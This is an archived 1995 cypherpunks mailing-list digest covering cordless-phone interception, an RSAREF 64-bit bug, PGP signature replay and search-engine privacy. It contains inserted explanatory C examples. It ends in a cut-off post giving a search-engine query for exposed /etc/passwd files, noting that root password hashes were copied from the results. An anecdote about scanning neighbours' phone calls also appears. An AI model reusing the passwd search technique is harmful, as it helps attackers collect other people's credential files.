From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: floyddb@alpha.c2.org
Date: Thu, 28 Dec 1995 06:02:25 +0800
To: cypherpunks@toad.com
Subject: 900 MHz phones
Message-ID: <199512270428.UAA04497@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


It seems like the hornets nest has been stirred.  

I was merely trying to point out a possible consumer grade hole in
some of the FH phones currently on the market.  If the Interceptor or Scout can
be used to listen to a FH phone, then surely it is being done.

I used to work with a guy who would program his scanner to all of his
neighbors' cordless phone frequencies, then he would call them to
verify his programming.  A six-pack on a Saturday night and the scanner would
be more entertaining than the bug light.  

Personally, my concern is with my next door neighbor listening to me talk to my
girlfriend, not the NSA.  If I want to arrange delivery of PGP to the Russians 
or where I should pick up my next 50 kg of cocaine, I'm *not* going to use my
home phone.  Because of these concerns, I refuse to own a cordless phone.  So    
if the 900 MHz phones are resistant to these consumer grade attacks, they might
be worth the money, otherwise the neighbors will just upgrade.

        Floyd D. Barber
        floyddb@alpha.c2.org
        Key fingerprint:
        8A 98 1F 6B 70 7A FE 24 
        35 D4 48 CF 9D F6 B0 91





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 29 Dec 1995 19:17:14 +0800
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: FH radios
In-Reply-To: <199512262025.OAA09759@cdale1.midwest.net>
Message-ID: <199512270252.VAA00427@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> I agree; but, if the information you are passing is truly that important
> just use a landline phone.  Eliminate the possible "leak".
> I'm not claiming that a landline phone is secure, but your cordless is
> connected to it, so no matter how good your security is on the phone it's no
> longer secure once it leaves the base station and enters the landline.

Argh....
Phones are ANYTHING but secure. Hence the STUIII & PGPphone.

An encrypted rf link is far better than any POTS....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 28 Dec 1995 07:05:46 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: a new idea: stocks == currency
Message-ID: <199512270801.AAA11701@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 18:22 12/26/95 -0800, Vladimir Z. Nuri wrote:
>...An I believe that future company
>stock will be considered a kind of currency issued by the company. when
>you are buying and selling stocks, what you are really doing is buying
>and selling currencies backed by different corporate entities. 

Here are some differences between stocks and currencies.  I don't know how
they affect your arguments, but I do invite comment:


                                Stocks                  Currencies

(1) Voting                      Most stock              Based on residency
                                implies voting          not net worth

(2) Reputation availability     Many stocks,            Few currencies,         
                                reputations hard to     reputations well known
                                find

(3) Legal backing               Based on government     same

(4) Dividends                   Commonly paid           never heard of it


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Dec 1995 00:53:23 +0800
To: Adam Shostack <tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512270801.AAA11744@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:53 12/25/95 -0500, Adam Shostack wrote:
>        The basic problem is that (personal) spam is a social, not a
>technical problem.  If someone wants to annoy you via the internet,
>they can do so.  You can raise the cost of their annoying you, but you
>need to be careful not to make it difficult to talk to you.

It seems to me that one of the technical problems of the personal spam is
the way it can grow into a denial of service attack on your system.  If it
takes you more horsepower to filter the spam than it takes to generate it,
then you are particularly vulnerable.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 28 Dec 1995 04:50:08 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
Message-ID: <v02140a08ad060f437c51@[165.254.158.232]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:23 12/26/95, tallpaul wrote:

>I hadn't picked up the problem you mentioned. Thanks for pointing it out.
>

You're welcome - You _did_ ask for comments/analysis <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Thu, 28 Dec 1995 10:01:04 +0800
To: stig@hackvan.com (Stig)
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery]  [Vaughan Pratt]
In-Reply-To: <m0tUjjD-0006F1C@hackvan.com>
Message-ID: <9512270551.AA23874@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> This is all wishful thinking.  A 26-MHz wide channel such as 902-928MHz
> has a channel capacity of 2*26 Mbs or 6.5 megabytes/sec.  So if someone

	That is not what Mr Shannon says,  Shannon's law relates data
rate, bandwidth and signal to noise ratio - the "channel capacity" of 26
mhz of spectrum is determined by the signal to noise ratio in the 26 mhz
channel and ranges from much less than 26 mbs to several times that rate
depending on the signal to noise ratio (and of course how clever the
modulation technology is at exploiting it).  Witness a 28.8 kb modem
which stuffs 28.8 kb into less than 3.2 khz given about 32 db gross SNR.

	But more significant to the predetection recording technique you
are talking about is how many samples a second it takes to reproduce
information in the 26 mhz bandwidth.   Crudely, as a rule of thumb
the Nyquist criterion would suggest that you need to sample at twice
the highest frequency (or 26 mhz if you downtranslate to DC).  This
means 52 megasamples per second.

	Now depending on how much junk there is in the 902-928 mhz band
at the location of interest and how far below the other signals the
signal of interest is, you might be able to get away with 8 bit samples
(providing about 35 db dynamic range) but would probably need more bits
than that for things to work reliably.  Say 12 bits (72 Mbytes/sec) or
16 bits (104 Mbytes/sec),  Yes, perhaps compression could buy you back
some of that, but you are still realistically talking about recording
somewhere between maybe 20 and 100 Mbytes/sec.

	The low end of this range is about the upper limit of present
day high performance disk system bandwidth.  So you are not talking
about a simple configuration with off the shelf disks and controllers
(unless you run several in parallel).    And one minute of audio gobbles
up way more than a gigabyte, or less than  2 minutes per $K of disk
cost.  And that assumes some compression.


> can tell *that* you are transmitting somewhere within that channel then
> they simply record *everything* at that data rate in the entire
> channel, your transmission and everyone else's, for the necessary
> time.  A $600 3.5Gb Sequel drive can record a ten-minute transmission;
> then the eavesdropper can use one Pentium or two dozen, budget
> permitting, to extract your message from that data.  If all you are
> doing is frequency hopping or spread spectrum, reconstruction is a very
> undemanding algorithmic task, and one Pentium should be able to
> reconstruct your signal the same day, two dozen the same hour.
> 

	I will agree that such techniques can be used, and am well aware
that they have been used for the last 25 or so years by the NSA and
other like organizations for handling this kind of problem (originally
in the HF radio spectrum for finding and reading covert burst
transmissions - at least so I have heard).


> >But to get back to the original point of this thread - while
> >such techniques are possible (as is full hard encryption), it is my
> >understanding that actual consumer 900 mhz digital cordless phones
> >that use frequency hopping use a very limited set of frequencies
> >and a small set of fixed hopping patterns and don't hop very fast. 
> 
> Hopping speed is almost completely irrelevant to the computational
> complexity of this problem.
> 
	I agree in general, though the degenerate case of very slow
hopping permits of some simplifications and speedups since demodulating
bits between hops can be done with less computation per sample than
estimating where the next hop frequency is when it is unknown.  And a
phone that slowly hops in a fixed simple pattern onto a small number of
channels can be demodulated by very simple approaches indeed, including
much less sophisticated and costly ones than fast DSP of wideband
sampled channels.

> 
> You can never overestimate the cost of decryption.  What looks
> expensive enough today to decrypt can plummet by orders of magnitude on
> alarmingly short notice.  We used to think TCP was mildly secure until
> easily installed sniffers became freely available on the internet that
> would reconstruct a telnet connection and print out the first 100
> characters, making it child's play to extract passwords.
> 
	I must say that I was not among those who ever thought that TCP
was secure, perhaps because I have spent too much time looking at packet
dumps from protocol analyzers and bus traffic  on logic analyzers. And
even the oldest and slowest systems could reconstruct TCP - it was not a
leap of system technology at all, but a leap of hacker application
skills and awareness.  I hate to even whisper the other places in the
fragile web of our infrastructure that are vulnerable to intelligent
attack ... there are many unexploited holes left even as we plug some of
the obvious ones.   The good thing is that people are beginning to think
about them.


> If you think that you are secure because the effort of an attack seems
> on the high side, bear in mind that the tasks in a systematic attack can
> by definition of "systematic" be programmed, greatly easing the
> attacker's task.  And once programmed, the program can be distributed to
> all and sundry on the internet.
> 
	That I agree with and think the current rash of sophisticated
hacker tools in the hands of relatively unsophisticated kids who could
in no way have created them  proves your point well.

> If a given level of cryptographic strength seems adequate for a message,
> add several orders of magnitude and maybe you'll be lucky.  
> 
	I wouldn't consider hopping or spread spectrum cryptography.  
Historically they have been viewed as techniques for avoiding jamming
and interference and sometimes also for making signals harder to find
rather than as information security techniques.  Their use in cordless
phones is primarily to avoid interference from other users of the
902-928 band and not for security.


> I know of only two really satisfactory places to hide information worth
> hiding: combinatorial search space (read: real encryption such as DES
> or RSA, with a hefty key),

	I think we all agree that security by obscurity is not real
security at all.  But even the security of mathematical crypto is mostly
unproven as of yet - we merely think things are difficult to compute
because we don't know an easy way to do it, not because there is a clear
proof that is true.

							Dave Emery






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 28 Dec 1995 05:56:52 +0800
To: cypherpunks@toad.com
Subject: Bidzos on C-span
Message-ID: <8NaRgD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I was very impressed by Bidzos's talk to C-Span. I'm sorry I didn't tape it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 28 Dec 1995 12:32:14 +0800
To: sameer <sameer@c2.org>
Subject: Re: fun with rsaref and 64-bit machines
In-Reply-To: <199512270120.RAA19559@infinity.c2.org>
Message-ID: <30E12C02.54F7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
>         Does anyone know if RSAREF works on 64 bit CPUs? It seems
> that RSAREF's NN_Mod is getting stuck in digit.c at:
> 
> 99         */
> 100       while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {
> 101         if ((t[0] -= c) > (MAX_NN_DIGIT - c))
> 102           t[1]--;
> 103         aLow++;
> 104       }

  In global.h, UINT4 is typedef'd to be unsigned long int, which is a 64 bit
value on the DEC alpha system.  The type UINT4 is supposed to be a 32-bit
value.  On the DEC system you need to make that be an unsigned int, which is
32-bits.  I've complained to RSA before about this problem, as it bit me
when I was porting SSLREF to the DEC machine.  They mumbled something about
people using the pre-compiled libraries, and ignored me.  It would be
so easy for them to just ifdef this one line...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
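
Why the quoted loop stops terminating once the digit type is 64 bits wide, as an added example (not RSAREF source): the borrow test compares against a 32-bit maximum, so it is only valid when the digit wraps at 2^32. The macro and function names, the inputs and the iteration cap are assumptions, as is MAX_NN_DIGIT being 0xffffffff.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption for this sketch: the digit maximum is the fixed 32-bit constant,
   whatever type ends up holding a digit. */
#define MAX_NN_DIGIT 0xffffffffu
#define ITER_CAP 1000000L /* lets the demo stop where the real loop would spin */

/* Expands to the quoted two-digit subtract loop for a chosen digit type.
   t[1]:t[0] is the value, c the divisor digit. Returns the number of
   subtractions (the quotient), or -1 when ITER_CAP is reached. */
#define DEFINE_SUB_LOOP(NAME, DIGIT)                                  \
    static long NAME(DIGIT hi, DIGIT lo, DIGIT c)                     \
    {                                                                 \
        DIGIT t[2] = { lo, hi };                                      \
        long count = 0;                                               \
        while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {            \
            /* borrow test: only valid if t[0] wraps at 2^32 */       \
            if ((t[0] -= c) > (MAX_NN_DIGIT - c))                     \
                t[1]--;                                               \
            if (++count >= ITER_CAP)                                  \
                return -1;                                            \
        }                                                             \
        return count;                                                 \
    }

DEFINE_SUB_LOOP(sub_loop_32, uint32_t) /* digit type as intended        */
DEFINE_SUB_LOOP(sub_loop_64, uint64_t) /* "unsigned long" where it is 64 bits */

/* Build-time guard: refuse to compile if the digit type is not 32 bits. */
typedef uint32_t digit32;
_Static_assert(sizeof(digit32) * CHAR_BIT == 32, "digit type must be exactly 32 bits");

int main(void)
{
    /* Constructed input: value 2^32 + 5 divided by 2^31, so a borrow from
       the high digit is needed on the first subtraction. */
    printf("32-bit digit, borrow case: %ld\n", sub_loop_32(1, 5, 0x80000000u));
    printf("64-bit digit, borrow case: %ld\n", sub_loop_64(1, 5, 0x80000000u));
    /* No borrow needed: both widths agree, which is why the fault is latent. */
    printf("32-bit digit, no borrow:   %ld\n", sub_loop_32(0, 10, 3));
    printf("64-bit digit, no borrow:   %ld\n", sub_loop_64(0, 10, 3));
    printf("unsigned long here is %u bits\n",
           (unsigned)(sizeof(unsigned long) * CHAR_BIT));
    return 0;
}
```

With a 64-bit digit the first borrow leaves t[0] near 2^64, so every later subtraction also looks like a borrow and the high digit wraps below zero instead of reaching it.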




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 04:17:42 +0800
To: cypherpunks@toad.com
Subject: DejaNews and Alta Vista Search Tools, and Privacy Implications
Message-ID: <ad065486000210045fdd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(Side note: I seem to have returned from my holiday away from this area and
away from computers to a war zone, with multiple flames and threats of
legal action. Being a part of the Cypherpunks group, and potentially part
of the "criminal conspiracy" to defame, am I included in the lawsuits? I
wonder.)

Anyway, a point of clarification of a point, lest there be the belief that
_all_ Cypherpunks are opposed to comprehensive Web search tools:


At 8:46 PM 12/23/95, Steven L. Baur wrote:

>Furthermore, no one has mentioned the positive changes made to
                                       ^^^^^^^^?
>Dejanews since it got bashed thoroughly on this list a few weeks ago.
>They've significantly turned down the amount of old information
>indexed, and have restricted the groups (and mailing lists) they
>archive.

I for one don't consider this to be a positive development. Reducing the
time horizon for searches has no real effect on the compilation of dossiers
(for example), but certainly makes DejaNews less useful. (And I'd be
willing to bet that the time horizon was scrunched down for space and time
reasons, not for reasons of privacy; the horizon will likely _increase_ as
users ask for, and perhaps are willing to pay a bit for, longer time
horizons.)

And I don't believe the dominant thinking of folks who commented was that
DejaNews was worthy of "bashing." In fact, I found it all very interesting,
and a confirmation of what many of us expected would soon happen, i.e.,
fast access to past comments.

I think I and several others commented on the major implications for
privacy, especially vis-a-vis the way corporations will be able to see
compilations of postings to "outrageous" groups. Indeed, I know of some
people hiring programmers who are already using such tools to get a better
understanding of whom they may be hiring, or not. But my comments were not
in the vein of "something has to be done," but of recognition that a Brave
New World is fast unfolding.

Thinking that one is "safe" because a particular search service is not
including all the groups or mailing lists it _could_ include is illusory
(one is reminded of ostriches....). The same thinking happened several
years ago when a great hue and cry in the media caused Lotus to abandon
plans to sell a CD-ROM to individuals with publicly available census and
other data on it about neighborhoods, phone numbers, etc. Inasmuch as the
non-individual entities (corporations, mass mailers, courts, law
enforcement, etc.) already have full access to such databases, all the hue
and cry really accomplished was to give individuals a false sense of
security and privacy. A triumph of feelgood style over substance.

Real privacy and security comes from steps taken to make the information
private in the first place, not to ex post facto limit access.

(I am not claiming that Steven Baur or anyone else on our list is calling
for laws to limit Web search engines, just giving my views about this. As a
matter of fact, however, I am hearing rumblings in other places that "there
ought to be a law" about these archives, indexes/indices, etc. Same old
story. Kind of hard to enforce such laws when the indexes are in Holland,
or Byelorussia, or "somewhere in cyberspace." )

Face it, every single word written by any of us to any Usenet newsgroup,
going back to the beginning of Usenet, and expanding out to many
ostensibly-private mailing lists, will fairly soon be searchable. (Add some
digital cash and proxy/remailer features, and someone will be incentivized
to put some really big arrays of optical disks up for searching. And if the
U.S. tries to "regulate" such searches....well, I'm preaching to the choir
here....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 29 Dec 1995 04:16:40 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251953.OAA01614@homeport.org>
Message-ID: <qJoRgD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the underlying problem is that the way PGP signatures are used by most
people, they validate a text, but allow it to be quoted out of context in an
e-mail or Usenet forgery. E.g., suppose Alice posts a PGP-signed text in
alt.sex. Bob forges a Usenet article in misc.kids, making it look like it came
from Alice and quoting her PGP-signed body. Alice will have a tough time
convincing the public that she didn't post it -- after all, her signature
verifies. (There are many people on the net who don't comprehend the
argument that the Path: is clearly bogus). Or: Bob writes Alice a sexually
explicit letter and forgets to say "Dear Alice" in the signed block. Alice
forges an e-mail to Carol, making it look like it came from Bob and quoting
the signed block. Bob would have to rely on the analysis of Received:
headers to repudiate such a forgery.

I suggest to the kind folks working on PGP 3 that there should be a standard
protocol to include within the signed portion the information on when and for
whom this text is written: i.e. the list of e-mail recipients and/or Usenet
newsgroups, which could be easily compared with the RFC 822/1036 headers of
an e-mail/Usenet article. Perhaps there could be a new option for PGP to look
_outside_ the signed block and match the headers with what's inside the
block. E.g., suppose the signature block says: this text was written by
alice@zog.org, posted to alt.sex and alt.sex.banal and e-mailed to
bob@masons.com. Suppose PGP is asked to check the signature in a file that
purports to be an e-mail or a Usenet article and has some headers before the
signed portion. If there is a list of To: recipients, and it includes someone
other than the recipients listed within the signed block; or if there is
a Newsgroups: header, and it includes newsgroups not listed within the signed
portion; then the input is bogus. For compatibility with the existing
software, if the signed block doesn't include this info, then this checking
shouldn't be done, of course.

(Yes, one could do this with a wrapper to PGP, making the whole thing even
more user-hostile.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
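
The header check proposed in the message above, sketched as the wrapper its last paragraph mentions (an added example, not PGP code). The "Signed-To:" and "Signed-Newsgroups:" line names, the function names and the sample messages are hypothetical, and the signature itself is assumed to have been verified by PGP already.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum verdict { CONTEXT_OK, CONTEXT_BOGUS, CONTEXT_UNCHECKED };
#define BEGIN_SIGNED "-----BEGIN PGP SIGNED MESSAGE-----"
#define BEGIN_SIG    "-----BEGIN PGP SIGNATURE-----"

static int eq_ci(const char *a, const char *b, size_t n) /* case-insensitive */
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Value of the first line in [start,end) beginning with `name`: 1 found,
   0 absent, -1 too long (fail closed). Folded header lines are not handled. */
static int find_field(const char *start, const char *end, const char *name,
                      char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    out[0] = '\0';
    for (const char *p = start; p < end; ) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        if (!eol) eol = end;
        if ((size_t)(eol - p) >= nlen && eq_ci(p, name, nlen)) {
            size_t len = (size_t)(eol - p) - nlen;
            if (len >= outlen) return -1;
            memcpy(out, p + nlen, len);
            out[len] = '\0';
            return 1;
        }
        p = (eol < end) ? eol + 1 : end;
    }
    return 0;
}

/* Next comma- or space-separated token, or NULL at the end of the list. */
static const char *next_token(const char **cursor, size_t *len)
{
    const char *p = *cursor;
    while (*p == ',' || isspace((unsigned char)*p)) p++;
    const char *q = p;
    while (*q && *q != ',' && !isspace((unsigned char)*q)) q++;
    *len = (size_t)(q - p);
    *cursor = q;
    return *len ? p : NULL;
}

/* 1 if every entry of `outer` also appears in `signed_list`. */
static int is_subset(const char *outer, const char *signed_list)
{
    const char *t, *s; size_t tn, sn;
    while ((t = next_token(&outer, &tn)) != NULL) {
        const char *cur = signed_list;
        int found = 0;
        while (!found && (s = next_token(&cur, &sn)) != NULL)
            found = (sn == tn && eq_ci(s, t, tn));
        if (!found) return 0;
    }
    return 1;
}

/* Assumes PGP itself has already verified the signature on the block. */
enum verdict check_context(const char *msg)
{
    char to[512], ng[512], sto[512], sng[512];
    const char *hdr_end = strstr(msg, "\n\n");
    const char *sb = hdr_end ? strstr(hdr_end, BEGIN_SIGNED) : NULL;
    const char *se = sb ? strstr(sb, BEGIN_SIG) : NULL;
    if (!se) return CONTEXT_UNCHECKED;

    int has_sto = find_field(sb, se, "Signed-To:", sto, sizeof sto);
    int has_sng = find_field(sb, se, "Signed-Newsgroups:", sng, sizeof sng);
    if (!has_sto && !has_sng) return CONTEXT_UNCHECKED; /* old-style block */

    int has_to = find_field(msg, hdr_end, "To:", to, sizeof to);
    int has_ng = find_field(msg, hdr_end, "Newsgroups:", ng, sizeof ng);
    if (has_sto < 0 || has_sng < 0 || has_to < 0 || has_ng < 0) return CONTEXT_BOGUS;
    if (has_to && !is_subset(to, sto)) return CONTEXT_BOGUS;
    if (has_ng && !is_subset(ng, sng)) return CONTEXT_BOGUS;
    return CONTEXT_OK;
}

/* Constructed samples: one signed block under three sets of outer headers. */
#define BLOCK BEGIN_SIGNED "\n\nSigned-To: bob@example.com\n" \
    "Signed-Newsgroups: alt.test, alt.test.more\n\nArticle text.\n" \
    BEGIN_SIG "\n(signature omitted)\n"
static const char GENUINE[]  = "From: alice@example.org\nNewsgroups: alt.test\n\n" BLOCK;
static const char REPLAYED[] = "From: alice@example.org\nNewsgroups: misc.test\n\n" BLOCK;
static const char RESENT[]   = "From: alice@example.org\nTo: carol@example.net\n\n" BLOCK;

int main(void)
{
    printf("genuine=%d replayed=%d resent=%d\n", check_context(GENUINE),
           check_context(REPLAYED), check_context(RESENT));
    return 0;
}
```

A field that overflows its buffer is treated as bogus rather than truncated, so an over-long To: line cannot hide an unlisted recipient past the end of the buffer.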




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 29 Dec 1995 05:50:08 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512271205.HAA08576@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 27, 1995 00:50:13, '"Robert A. Rosenberg" <hal9001@panix.com>'
wrote: 
 
 
>At 13:23 12/26/95, tallpaul wrote: 
> 
>>I hadn't picked up the problem you mentioned. Thanks for pointing it out.

>> 
> 
>You're welcome - You _did_ ask for comments/analysis <g>. 
> 
 I wasn't being sarcastic with the "thank you" and I don't usually treat
criticism as a neo-flame. 
 
As you may have inferred from other posts of mine, I am more interested and
knowledgeable about the social aspects of the privacy/crypto/anon debates
than the code/algo aspects. 
 
I know other people who share my interests but who proceed to write,
publish, comment on the tek issues without understanding them. Getting a
better understanding of them is one of the reasons I'm on the list.
Sometimes I'll venture a view on one of the tek issues, in part to test my
knowledge of those issues from the tek angle. Criticism is first a small
price to pay for the ability to do this. Second, it improves my knowledge
of the tek. 
 
--tallpaul 
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Thu, 28 Dec 1995 14:07:40 +0800
To: mixmaster@remail.ecafe.org (Ecafe Mixmaster Remailer)
Subject: another anonymous poster helping to destroy our rights
In-Reply-To: <199512271335.NAA07018@pangaea.ang.ecafe.org>
Message-ID: <9512271343.AA13409@all.net>
MIME-Version: 1.0
Content-Type: text


We just heard from another anonymous poster trying to destroy our rights
to free speech.  How long will the cypherpunks put up with this?

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Dec 1995 13:05:46 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: fun with rsaref and 64-bit machines
In-Reply-To: <30E12C02.54F7@netscape.com>
Message-ID: <199512271646.IAA23331@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	That fixes it, thanks.

> 
> sameer wrote:
> > 
> >         Does anyone know if RSAREF works on 64 bit CPUs? It seems
> > that RSAREF's NN_Mod is getting stuck in digit.c at:
> > 
> > 99         */
> > 100       while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {
> > 101         if ((t[0] -= c) > (MAX_NN_DIGIT - c))
> > 102           t[1]--;
> > 103         aLow++;
> > 104       }
> 
>   In global.h, UINT4 is typedef'd to be unsigned long int, which is a 64 bit
> value on the DEC alpha system.  The type UINT4 is supposed to be a 32-bit
> value.  On the DEC system you need to make that be an unsigned int, which is
> 32-bits.  I've complained to RSA before about this problem, as it bit me
> when I was porting SSLREF to the DEC machine.  They mumbled something about
> people using the pre-compiled libraries, and ignored me.  It would be
> so easy for them to just ifdef this one line...
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 28 Dec 1995 12:19:18 +0800
To: cypherpunks@toad.com
Subject: FYI - telecom bill or not there are still censors
Message-ID: <2.2.32.19951227172007.0070f34c@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


This arrived in my mailbox (I have *not* personally confirmed it) ....

According to reports popping up in other places around the Compuserve 
Information Service it appears that they have taken a stance of Internet 
censor and are now blocking access to certain Usenet newsgroups.  This 
move took place just before the Christmas holiday and remains unannounced 
to the membership/subscriber base.  

Just about any Usenet newsgroup with the word "sex" or "erotica" is no 
longer available. Attempts to subscribe to these newsgroups produce an 
error message stating that the newsgroup does not exist.  In reality its 
access has been blocked.

A short list (very short) of other newsgroup feeds that are no longer 
accessible as provided by another party to me include:

alt.homosexual
alt.magick.sex
alt.magick.sex.angst
alt.motss.bisexua-l
alt.politics.sex
alt.recovery.addiction.sexual
alt.recovery.sexual-addiction
alt.religion.sexuality
alt.sex
alt.support.disabled.sexuality
clari.news.crime.sex
clari.news.gays
clari.news.sex
gay-net.coming-out
rec.arts.erotica
shamash.gayjews
soc.support.youth.gay-lesbian-bi

Other newsgroups also remain blocked or eliminated from a provided 
pick-list and if this is allowed to continue the likelihood of this 
spreading to other topics that a select group find offensive or 
intolerable is a very real threat.

A number of these newsgroups are legitimate groups for people needing 
support or recovery or places where frank discussions on adult subjects 
take place.  Some are religious in nature though non-mainstream.  Others 
are associated with the gay lifestyle.  As you can see there is a 
definite trend being set here.

So far much of this change in access remains unknown to the vast majority 
of Compuserve customers who remain away from their terminals for the 
holidays.

If this bothers you I would suggest that you send a message to Compuserve 
customer services at GO FEEDBACK.  Those using autopilot programs send 
e-mail to Feedback at 70006,101.  From outside of Compuserve send e-mail 
to 70006.101@compuserve.com

We are supposedly paying a monthly fee which includes =full= Internet 
service and access.  We are no longer getting it.  That is 
misrepresentation.

Take this issue to your other favorite forums, newsgroups, etc.  If we 
allow freedom of speech and access to be lost now we will never get it 
back.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 28 Dec 1995 10:22:08 +0800
To: ponder@wane-leon-mail.scri.fsu.edu (P.J. Ponder)
Subject: Re: MD5 for DOS/Windows
In-Reply-To: <Pine.3.89.9512262006.A24030-0100000@wane3.scri.fsu.edu>
Message-ID: <199512271437.JAA04030@homeport.org>
MIME-Version: 1.0
Content-Type: text



| Anybody have a DOS or Windows implementation of MD5 available?
| Thanks.

	Anytime I need to find crypto code, I go to the University of
Milan.  ftp.dsi.unimi.it

	The best selection of hash functions, raw ciphers, PGP, and
much other stuff I know of.  Worth a place in your hotlists.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Thu, 28 Dec 1995 14:12:55 +0800
To: cypherpunks@toad.com
Subject: Re: Misconfigured Web Servers
Message-ID: <9511278200.AA820083186@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     Re: the "trick" below... an even more effective search is the 
     following...
     
     http://www.altavista.digital.com/cgi-bin/query?pg=aq&what=web&q=url%3A
     etc%2Fpasswd&r=&d0=&d1=&Submit.x=51&Submit.y=14
     
     which searches all URLs that contain etc/passwd 
     
     See for yourself!
     
     
     David Klur
     
     
_____________________________ Reply Separator _________________________________
Subject: BoS: Misconfigured Web Servers
Author:  nobody@mail.uu.net at Internet-USA
Date:    12/26/95 3:57 PM


     Everyone,
     
     A friend of mine showed me a nasty little "trick" over the weekend. He 
     went to a Web Search server (http://www.altavista.digital.com/) and 
     did a search on the following keywords -
     
             root: 0:0 sync: bin: daemon:
     
     You get the idea. He copied out several encrypted root passwords from 
